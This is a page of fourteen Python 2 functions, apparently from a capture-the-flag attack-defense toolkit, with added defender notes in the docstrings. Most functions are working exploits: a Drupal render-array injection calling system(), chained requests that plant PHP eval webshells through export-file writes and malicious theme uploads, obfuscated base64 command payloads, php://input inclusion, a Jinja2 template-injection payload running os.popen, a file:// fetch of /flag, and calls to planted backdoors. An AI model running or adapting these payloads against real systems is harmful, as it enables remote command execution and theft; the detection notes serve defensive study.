Ejemplo n.º 1
def vulnerable_attack(target, target_port, cmd):
    '''
    Send one POST to a user-registration AJAX endpoint with form-render keys
    that name PHP system() as a callback and `cmd` as its argument.

    NOTE(review): the original docstring described an eval($_POST[333]) /
    assert($_POST[333]) backdoor. The request built below does not use that
    parameter; it looks like the publicly documented Drupal 8 render-array
    ("#lazy_builder") injection -- confirm against the target application.

    target, target_port -- host and port handed to http().
    cmd -- command string; URL-quoted and placed in the form body.

    http, quote, headers, debug_print and dump_error are defined elsewhere
    in the file. The visible excerpt ends without returning res.

    Defender notes:
    - Detection: requests to /user/register carrying element_parents= and
      ajax_form=1 in the query string, with '#'-prefixed keys such as
      mail[#type] or mail[0][#lazy_builder] in the body.
    - Mitigation: apply the vendor security update; user-supplied form input
      must never be able to introduce '#'-prefixed render-array properties.
    '''

    try:
        #cmd = base64.b64encode(cmd)
        # This payload may not work under some php versions
        #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd
        #print payload
        #payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));"%cmd
        # The command is sent as-is; only URL-quoting is applied below.
        payload = cmd
        data = 'form_id=user_register_form&mail[0][#lazy_builder][0]=system&mail[#type]=markup&mail[0][#lazy_builder][1][0]=%s' % quote(
            payload)
        res = http(
            "post", target, target_port,
            "/user/register?element_parents=account/mail/%23value&ajax_form=1",
            data, headers)
    except Exception, e:
        # Any failure is logged and collapsed into the sentinel string "error".
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
Ejemplo n.º 2
def shit(target, target_port, cmd):
    '''
    Chain several requests against a web application under /web/: store a
    PHP snippet in a profile field, have an export endpoint write a file
    under the web root, then POST `cmd` to that file.

    target, target_port -- host and port of the application.
    cmd -- command string interpolated into a PHP system() call.

    Returns whatever http() returns for the final POST (also printed).
    http, quote, headers and debug_print are defined elsewhere in the file.

    Defender notes:
    - Root cause visible here: the export endpoint takes its output path
      from the fileName query parameter, and the value is an absolute path
      ending in .php inside /var/www/html/web/files/.
    - Detection: fileName= with an absolute path or a script extension on
      export URLs; '<?php' in profile form fields; POSTs to freshly created
      32-hex-character .php files under /web/files/.
    - Mitigation: generate export file names server-side outside the web
      root, reject script extensions, encode stored profile data on output,
      and disable PHP execution in the files directory.
    '''
    s = requests.Session()
    ip = target
    # File name derived from the current time; MD5 is used only to get a
    # hex string here, not for any security property.
    shellhash = hashlib.md5(str(time.time())).hexdigest()

    url = 'http://%s:%s/web/login' % (ip, str(target_port))
    url_2 = 'http://%s:%s/web/login_check' % (ip, str(target_port))
    url_3 = 'http://%s:%s/web/' % (ip, str(target_port))
    url_4 = 'http://%s:%s/web/settings/' % (ip, str(target_port))
    url_5 = 'http://%s:%s/web/logout' % (ip, str(target_port))
    url_6 = 'http://%s:%s/web/admin/order/manage/export/course?loop=s&start=0&fileName=/var/www/html/web/files/%s.php' % (
        ip, str(target_port), shellhash)
    url_7 = 'http://%s:%s/web/register/submited/1/ae797a91d0493acb27050b05c884a4ae' % (
        ip, str(target_port))
    # The bare string below is an unused expression statement: the same URLs
    # without the /web prefix, kept by the author as an alternative layout.
    '''
    url = 'http://%s:%s/login' % (ip,str(target_port))
    url_2 = 'http://%s:%s/login_check' %(ip,str(target_port))
    url_3 = 'http://%s:%s/' %(ip,str(target_port))
    url_4 = 'http://%s:%s/settings/' % (ip,str(target_port))
    url_5 = 'http://%s:%s/logout' % (ip,str(target_port))
    url_6 = 'http://%s:%s/admin/order/manage/export/course?loop=s&start=0&fileName=/var/www/html/web/files/%s.php' % (ip,str(target_port),shellhash)
    url_7 = 'http://%s:%s/register/submited/1/ae797a91d0493acb27050b05c884a4ae'  % (ip,str(target_port))
    '''
    # user login
    content = s.get(url).content
    # The CSRF token is cut out of the login page by fixed offsets around two
    # marker strings. NOTE(review): if either find() returns -1 the slice
    # silently yields a wrong token; nothing checks for that.
    index_1 = content.find('<meta name="description"')
    index_2 = content.find('name="csrf-token"/>')
    token = content[index_1 + 35 + len('<meta name="description"'):index_2 - 2]
    debug_print(token)
    # Credentials appear as '******' in this listing (presumably redacted).
    s.post(url_2,
           data={
               '_username': '******',
               '_password': '******',
               '_csrf_token': '%s' % token
           })
    s.get(url_3)

    # user shell
    # PHP source is stored in the profile "truename" field.
    shell = '<?php eval($_POST[2222]);?>'
    s.post(url_4,
           data={
               'profile[truename]': '%s' % shell,
               '_csrf_token': '%s' % token
           })
    s.get(url_5)

    # admin login
    # NOTE(review): the original comment calls this step "admin login", but
    # the request is a plain GET to a register/submited URL with a fixed
    # hash; how that yields a privileged session is not visible here.
    s.get(url_7)
    # Export request: the server writes its output to the fileName path.
    s.get(url_6, allow_redirects=False)
    # cmd is placed inside single quotes without escaping.
    payload = "system('%s');" % cmd
    data = '2222=%s' % quote(payload)

    res = http("post", target, target_port, "/web/files/%s.php" % shellhash,
               data, headers)
    print res

    return res
Ejemplo n.º 3
def send(hosts, msgs):
    '''
    Loop forever, sending one randomly chosen templated request to every
    host per iteration, with randomised User-Agent and Accept-Language.

    hosts -- iterable of "ip:port" strings; the last character of each entry
             is dropped before splitting (presumably a trailing newline --
             confirm against the caller).
    msgs -- list of templates of the form
            METHOD*---craso---*PATH*---craso---*PARAMS, where PARAMS may use
            the {crasolee_para} and {crasolee_para0} placeholders.

    Never returns. headers, ac_lang, http, quote, trash and para_key are
    defined elsewhere in the file; the purpose (presumably background or
    decoy traffic) is not stated in the code.

    Defender notes:
    - Roughly one request in seven carries a header named 'Hacked by' with
      the value "Redbud". A header name containing a space is not a valid
      HTTP field name, so it is a reliable filter or alert condition.
    - The User-Agent is drawn from a fixed list file, so User-Agent alone
      does not identify this traffic; correlate on source address, the
      one-second cadence and the repeated path templates instead.
    '''
    #here are your targets
    #for i in xrange(0,5):
    while True:
        # The User-Agent list is re-read from disk on every iteration.
        tmp_file = open("./data/ua.data", "rb")
        rd = tmp_file.readlines()
        headers['User-Agent'] = rd[random.randint(0, len(rd) - 1)].strip()
        tmp_file.close()
        rnds = random.randint(0, 6)
        # `headers` is a shared dict, so the marker header from a previous
        # iteration is removed before deciding whether to set it again.
        if headers.has_key('Hacked by'):
            headers.pop('Hacked by')
        if rnds == 0:
            headers['Hacked by'] = "Redbud"
        headers['Accept-Language'] = ac_lang[random.randint(
            0,
            len(ac_lang) - 1)]

        #print headers#['User-Agent']
        contents = msgs[random.randint(0, len(msgs) - 1)].strip()
        if not contents:
            continue
        contents = contents.split("*---craso---*")
        # NOTE(review): the guard admits two-part templates, but contents[2]
        # is read below; that IndexError is caught and printed by the
        # except clause inside the host loop.
        if len(contents) < 2:
            continue
        for host in hosts:
            # A malformed host entry raises here, outside the try block.
            ip, port = host[:-1].split(":")
            try:
                print contents[0] + " " + ip + ":" + port + contents[
                    1] + "?" + contents[2].format(crasolee_para=quote(trash()),
                                                  crasolee_para0=para_key())
                # GET puts the formatted parameters in the query string; any
                # other method sends them as the request body.
                if contents[0] == 'get' or contents[0] == 'GET':
                    tmp = http(
                        contents[0], ip, int(port), contents[1] + "?" +
                        contents[2].format(crasolee_para=quote(trash()),
                                           crasolee_para0=para_key()), '',
                        headers)
                else:
                    tmp = http(
                        contents[0], ip, int(port), contents[1],
                        contents[2].format(crasolee_para=quote(trash()),
                                           crasolee_para0=para_key()), headers)
            except Exception, e:
                print e
        time.sleep(1)
Ejemplo n.º 4
def shit(target, target_port, cmd):
    '''
    Chain several requests against a web application under /app.php/: store
    a PHP snippet in a profile field, log in again, have a student-export
    endpoint write a file under the web root, then POST `cmd` to that file.

    target, target_port -- host and port of the application.
    cmd -- command string interpolated into a PHP system() call.

    Returns whatever http() returns for the final POST (also printed).
    http, quote, headers and debug_print are defined elsewhere in the file.

    Defender notes:
    - Root cause visible here: the export endpoint takes its output path
      from the fileName query parameter, and the value is an absolute path
      ending in .php inside /var/www/html/web/files/tmp/.
    - Detection: fileName= with an absolute path or a script extension on
      export URLs; '<?php' in profile form fields; POSTs to 32-hex-character
      .php files under /files/tmp/.
    - Mitigation: generate export file names server-side outside the web
      root, reject script extensions, encode stored profile data on output,
      and disable PHP execution in the files directory.
    '''
    s = requests.Session()
    ip = target
    # File name derived from the current time; MD5 is used only to get a
    # hex string here, not for any security property.
    shellhash = hashlib.md5(str(time.time())).hexdigest()
    url = 'http://%s:%s/app.php/login' % (ip, str(target_port))
    url_2 = 'http://%s:%s/app.php/login_check' % (ip, str(target_port))
    url_3 = 'http://%s:%s/app.php/' % (ip, str(target_port))
    url_4 = 'http://%s:%s/app.php/settings/' % (ip, str(target_port))
    url_5 = 'http://%s:%s/app.php/logout' % (ip, str(target_port))
    url_6 = 'http://%s:%s/app.php/course_set/1/manage/course/1/manage/student/export/datas?fileName=/var/www/html/web/files/tmp/%s.php' % (
        ip, str(target_port), shellhash)

    # First login. The CSRF token is cut out of the login page by fixed
    # offsets around two marker strings. NOTE(review): if either find()
    # returns -1 the slice silently yields a wrong token.
    content = s.get(url).content

    index_1 = content.find('<meta name="description"')
    index_2 = content.find('name="csrf-token"/>')

    token = content[index_1 + 35 + len('<meta name="description"'):index_2 - 2]
    debug_print(token)
    # Credentials appear as '******' in this listing (presumably redacted).
    s.post(url_2,
           data={
               '_username': '******',
               '_password': '******',
               '_csrf_token': '%s' % token
           })
    s.get(url_3)

    # PHP source is stored in the profile "job" field, then the session is
    # logged out.
    shell = '<?php eval($_POST[2222]);?>'
    s.post(url_4,
           data={
               'profile[job]': '%s' % shell,
               '_csrf_token': '%s' % token
           })
    s.get(url_5)

    # Second login with a freshly scraped token. Both logins show the same
    # redacted placeholder, so whether a different account is used cannot be
    # told from this listing.
    content = s.get(url).content
    index_1 = content.find('<meta name="description"')
    index_2 = content.find('name="csrf-token"/>')
    token = content[index_1 + 35 + len('<meta name="description"'):index_2 - 2]
    debug_print(token)
    s.post(url_2,
           data={
               '_username': '******',
               '_password': '******',
               '_csrf_token': '%s' % token
           })
    # Export request: the server writes its output to the fileName path.
    s.get(url_6)

    # cmd is placed inside single quotes without escaping.
    payload = "system('%s');" % cmd
    data = '2222=%s' % quote(payload)

    res = http("post", target, target_port, "/files/tmp/%s.php" % shellhash,
               data, headers)
    print res

    return res
Ejemplo n.º 5
def waf_check(target, target_port):
    '''
    Compare the response to a plain POST with the response to a POST that
    carries the module-level get_payload / post_payload values.

    Returns True when both response bodies are identical, False otherwise,
    and prints a short status marker either way.

    url_label, timeout, get_payload, post_payload and http are defined
    elsewhere in the file. The name suggests the comparison is meant to tell
    whether a filter in front of the application alters the response when
    the payload is present -- the code itself only shows the equality test.

    Defender note: a filter that returns a distinct block page is
    distinguishable by exactly this kind of comparison; log and alert on the
    blocked request rather than relying on the block page going unnoticed.
    '''
    url = 'http://%s:%d%s' % (target, int(target_port), url_label)
    # Baseline request. "aasas" is not a real content coding; presumably it
    # is sent so the server answers uncompressed -- TODO confirm.
    r = requests.post(url,
                      timeout=timeout,
                      headers={"Accept-Encoding": "aasas"})
    res1 = r.text
    # Second request goes through the project's own http() helper with an
    # empty header dict.
    res2 = http('post', target, int(target_port),
                url_label + '?' + get_payload, post_payload, {})
    res2 = res2.decode('utf-8')
    if res1 == res2:
        print '|url__ok_|',
        return True
    print '|url_fail|',
    return False
Ejemplo n.º 6
def vulnerable_attack(target, target_port, cmd):
    '''
    Log in to /login.php, upload a .tar.gz containing a PHP file through
    /admin.php?action=themeinstall, then POST `cmd` to the extracted file
    under /data/themes/.

    target, target_port -- host and port of the application.
    cmd -- command string; URL-quoted and sent as the value of a randomly
           named request parameter.

    random_string, http, headers, debug_print and dump_error are defined
    elsewhere in the file. The visible excerpt ends without returning res.

    Defender notes:
    - Preconditions visible here: the admin login accepts the fixed password
      sent below, and the theme installer extracts uploaded archives into a
      directory that is served and executed as PHP.
    - Detection: multipart uploads to action=themeinstall followed by
      requests to /data/themes/<name>.php; new .php files in the themes
      directory outside a deployment.
    - Mitigation: change default admin credentials, validate archive
      contents before extraction, and deny script execution in the themes
      upload path.

    NOTE(review): local hygiene -- the two open() handles are never closed
    explicitly, and the temporary files use fixed /tmp paths that are built
    into shell command strings passed to os.popen().
    '''

    try:
        # This payload may not work under some php versions
        #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd
        #print payload
        s = requests.session()
        url_1 = "http://%s:%d/login.php" % (target, int(target_port))
        url_2 = "http://%s:%d/admin.php?action=themeinstall" % (
            target, int(target_port))
        # One random token is reused as file name, archive name and request
        # parameter name.
        my_hash = random_string()
        s.post(url_1,
               data="cont1=123456789&bogus=&submit=Log+in",
               headers={
                   "Accept-Encoding": "identity",
                   "Content-Type": "application/x-www-form-urlencoded"
               })

        shell_content = "<?php system($_REQUEST['%s']);?>" % my_hash
        file_name = my_hash + ".php"
        tar_name = my_hash + ".tar.gz"
        # Build the archive locally with the system tar binary.
        open('/tmp/%s' % file_name, 'w').write(shell_content)
        res = os.popen('cd /tmp;tar cvfz %s %s' % (tar_name, file_name)).read()
        debug_print(res)
        data = {"submit": "Upload"}
        files = {"sendfile": open("/tmp/" + tar_name, 'rb')}
        s.post(url_2,
               data=data,
               files=files,
               headers={"Accept-Encoding": "identity"})
        # Remove the local temporary files once the upload has been sent.
        res = os.popen('rm /tmp/%s /tmp/%s' % (file_name, tar_name)).read()
        debug_print(res)

        data = '%s=%s' % (my_hash, quote(cmd))
        res = http("post",
                   target,
                   target_port,
                   "/data/themes/%s" % (file_name),
                   data,
                   headers=headers)
    except Exception, e:
        # Any failure is logged and collapsed into the sentinel string "error".
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
Ejemplo n.º 7
def vulnerable_attack(target, target_port, cmd):
    '''
    Request /link?url=file:///flag and wrap the response body in the
    module-level cmd_prefix / cmd_postfix markers.

    NOTE(review): the original docstring described an eval($_POST[333]) /
    assert($_POST[333]) backdoor, which this code does not use. What it
    relies on is a server-side URL fetcher that accepts the file:// scheme.
    `cmd` is accepted for interface compatibility but never read.

    http, headers, cmd_prefix, cmd_postfix, debug_print and dump_error are
    defined elsewhere in the file. The visible excerpt ends without
    returning res.

    Defender notes:
    - Detection: url= parameters whose value starts with a non-http(s)
      scheme such as file://.
    - Mitigation: allow only http/https in the fetcher, resolve and check
      the destination against an allowlist, and run the service with no
      read access to secrets it does not need.
    '''
    try:
        payload = "/link?url=file:///flag"
        res = http("get", target, target_port, payload, "", headers)
        # Markers let the caller locate the response in combined output.
        res = cmd_prefix + str(res) + cmd_postfix
    except Exception, e:
        # Any failure is logged and collapsed into the sentinel string "error".
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
Ejemplo n.º 8
def vulnerable_attack(target, target_port, cmd):
    '''
    POST PHP source in parameter 222 to /index.php, where the target is
    expected to contain:

    eval($_POST[222]);

    target, target_port -- host and port handed to http().
    cmd -- command string; base64-encoded, then decoded again by the PHP
           snippet that is sent.

    http, quote, headers, debug_print and dump_error are defined elsewhere
    in the file. The visible excerpt ends without returning res.

    Defender notes:
    - The function name is assembled by string concatenation and the
      command travels base64-encoded, so a plain substring match on the
      function name or on the command text will not fire.
    - Detection: request bodies containing base64_decode together with PHP
      variable-function syntax; numeric POST parameter names.
    - Mitigation: remove the eval() of request data from index.php; no
      request filter is a substitute for deleting the backdoor.
    '''

    try:
        cmd = base64.b64encode(cmd)
        payload = "$a='sy'.'stem';$b = '%s';$a(base64_decode($b));" % cmd
        data = '222=%s' % quote(payload)
        res = http("post", target, target_port, "/index.php", data, headers)
    except Exception, e:
        # Any failure is logged and collapsed into the sentinel string "error".
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
Ejemplo n.º 9
def vulnerable_attack(target, target_port, cmd):
    '''
    POST raw PHP source as the request body to /index.php?f=a, where the
    target is expected to contain:

    include "php://input";

    target, target_port -- host and port handed to http().
    cmd -- command string; URL-unquoted, base64-encoded, then decoded again
           by the PHP snippet that is sent.

    http, headers, debug_print and dump_error are defined elsewhere in the
    file. The visible excerpt ends without returning res. How the f=a query
    parameter relates to the include is not visible here.

    Defender notes:
    - Detection: request bodies that begin with '<?php' on endpoints that
      normally receive form data.
    - Mitigation: never pass request-controlled values to include/require;
      keep allow_url_include disabled, which also stops php://input from
      being included.
    '''

    try:
        cmd = urllib.unquote(cmd)
        cmd = base64.b64encode(cmd)
        # The body is PHP source, not form-encoded data.
        data = "<?php $a='sy'.'stem';$b = '%s';$a(base64_decode($b));?>" % cmd
        res = http("post", target, target_port, "/index.php?f=a", data,
                   headers)
    except Exception, e:
        # Any failure is logged and collapsed into the sentinel string "error".
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
Ejemplo n.º 10
def vulnerable_attack(target, target_port, cmd):
    '''
    Request a URL path that consists of a template expression and read the
    rendered result back out of the "not found" page.

    NOTE(review): the original docstring described an eval($_POST[333]) /
    assert($_POST[333]) backdoor, which this code does not use. The request
    implies the application renders the requested path through a template
    engine when it builds its 404 page (the expression looks Jinja2-style --
    confirm against the target).

    target, target_port -- host and port handed to http().
    cmd -- command string concatenated into the expression without quoting
           or escaping.

    http, headers, debug_print and dump_error are defined elsewhere in the
    file. The visible excerpt ends without returning res.

    Defender notes:
    - Detection: '{{' or '__class__' / '__subclasses__' / '__globals__' in
      request paths.
    - Mitigation: pass the requested path to the template as a variable and
      let the engine escape it; never concatenate request data into template
      source.
    '''
    try:
        payload = "/{{().__class__.__bases__.0.__subclasses__().59.__init__.__globals__.linecache.os.popen(\"" + cmd + "\").read()}}"
        res = http("get", target, target_port, payload, "", headers)
        # Keep only the text between the fixed markers of the error page.
        # NOTE(review): if a marker is missing, find() returns -1 and the
        # slice yields unrelated text rather than failing.
        before = "<h1>URL "
        after = " not found</h1><br/>"
        s = res[res.find(before) + len(before):res.find(after)]
        res = s
    except Exception, e:
        # Any failure is logged and collapsed into the sentinel string "error".
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
Ejemplo n.º 11
def vulnerable_attack(target, target_port, cmd):
    '''
    POST `cmd` in the parameter "haozigege" to a JSP page inside a deployed
    web application.

    NOTE(review): the original docstring described a PHP eval($_POST[333]) /
    assert($_POST[333]) backdoor; the request below goes to a .jsp file and
    uses a different parameter. The page is presumably a planted JSP that
    runs the parameter value as a command -- confirm on the target.

    target, target_port -- host and port handed to http().
    cmd -- command string; URL-quoted and sent as the parameter value.

    http, quote, headers, debug_print and dump_error are defined elsewhere
    in the file. The visible excerpt ends without returning res.

    Defender notes:
    - Detection: requests to short, generically named .jsp files that are
      not part of the application's build output.
    - Mitigation: compare the deployed webapp directory with the build
      artifact, remove unexpected JSPs, and make the deployment directory
      read-only for the application server account.
    '''

    try:
        #cmd = base64.b64encode(cmd)
        # This payload may not work under some php versions
        #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd
        #print payload
        data = 'haozigege=%s' % quote(cmd)
        res = http("post", target, target_port,
                   "/charpter2-1.0-SNAPSHOT/1.jsp", data, headers)
    except Exception, e:
        # Any failure is logged and collapsed into the sentinel string "error".
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
Ejemplo n.º 12
def vulnerable_attack(target, target_port, cmd):
    '''
    POST PHP source in parameter 222 to /1.php, where the target is expected
    to evaluate that parameter.

    NOTE(review): the original docstring named $_POST[333] (eval / assert),
    but the request below sends parameter 222 -- one of the two is stale.

    target, target_port -- host and port handed to http().
    cmd -- command string; base64-encoded, then decoded again by the PHP
           snippet that is sent.

    http, quote, headers, debug_print and dump_error are defined elsewhere
    in the file. The visible excerpt ends without returning res.

    Defender notes:
    - Function names are split into concatenated fragments and invoked via
      call_user_func, so substring rules on the full function names will
      not fire.
    - Detection: call_user_func combined with quoted string concatenation
      in request bodies; requests to short, generically named .php files.
    - Mitigation: remove the file that evaluates request data; disable
      unneeded process-execution functions in the PHP configuration.
    '''

    try:
        cmd = base64.b64encode(cmd)
        # This payload may not work under some php versions
        #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd
        #print payload
        payload = "call_user_func('sy'.'stem',call_user_func('bas'.'e64_dec'.'ode','%s'));" % cmd
        data = '222=%s' % quote(payload)
        res = http("post", target, target_port, "/1.php", data, headers)
    except Exception, e:
        # Any failure is logged and collapsed into the sentinel string "error".
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
Ejemplo n.º 13
def vulnerable_attack(target, target_port, cmd):
    '''
    Send a GET to /index.php/index/index/ with back1=system and
    back2=<cmd> in the query string.

    NOTE(review): the original docstring described an eval($_POST[333]) /
    assert($_POST[333]) backdoor, which this code does not use. The request
    implies the application calls the function named in back1 with back2 as
    its argument -- confirm in the target's controller code.

    target, target_port -- host and port handed to http().
    cmd -- command string; URL-quoted and sent as back2.

    http, quote, headers, debug_print and dump_error are defined elsewhere
    in the file. The visible excerpt ends without returning res.

    Defender notes:
    - Detection: query parameters whose value is the name of a PHP
      process-execution function; the command text appears in access logs
      because the request is a GET.
    - Mitigation: never use request data as a callable name; where dynamic
      dispatch is needed, map request values through a fixed allowlist.
    '''

    try:
        #cmd = base64.b64encode(cmd)
        # This payload may not work under some php versions
        #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd
        #print payload
        res = http(
            "get", target, target_port,
            "/index.php/index/index/?back1=system&back2=%s" % quote(cmd), "",
            headers)
    except Exception, e:
        # Any failure is logged and collapsed into the sentinel string "error".
        debug_print(traceback.format_exc())
        dump_error("attack failed", target, "vulnerable attack")
        res = "error"
Ejemplo n.º 14
def vulnerable_attack(target,target_port,cmd):
        
    '''
    POST to /index.php/admin/login/backdoor with the query parameter
    hongkexueyuan=highlight_file and "cmd=<flag_path>" as both the request
    body and the Cookie header.

    NOTE(review): the original docstring described an eval($_POST[333]) /
    assert($_POST[333]) backdoor, which this code does not use. The request
    implies the endpoint calls the function named in the query string on a
    path taken from the cookie or body -- confirm in the target code.
    `cmd` is base64-encoded below but the result is never sent.

    target, target_port -- host and port handed to http().
    cmd -- accepted for interface compatibility; unused in the request.

    flag_path, http, headers, debug_print and dump_error are defined
    elsewhere in the file. The visible excerpt ends without returning res.

    NOTE(review): this function writes Cookie and X-Forwarded-For into the
    `headers` dict it did not create; if that dict is shared, later requests
    from other functions carry these values too.

    Defender notes:
    - Detection: requests to a route literally named "backdoor"; query
      values naming file-reading functions; X-Forwarded-For supplied by an
      untrusted client.
    - Mitigation: remove the route, and only honour X-Forwarded-For when it
      is set by a trusted reverse proxy.
    '''
    
    try:           
        cmd = base64.b64encode(cmd)
        # This payload may not work under some php versions
        #payload = "('sy'.'stem')(('bas'.'e64_'.'decode')('%s'))==0"%cmd
        #print payload
        data = 'cmd=%s'% (flag_path) 
        headers['Cookie'] = data
        headers['X-Forwarded-For'] = '8.8.8.8'
        res = http("post",target,target_port,"/index.php/admin/login/backdoor?hongkexueyuan=highlight_file",data,headers)
    except Exception,e:
        # Any failure is logged and collapsed into the sentinel string "error".
        debug_print(traceback.format_exc())     
        dump_error("attack failed",target,"vulnerable attack")
        res = "error"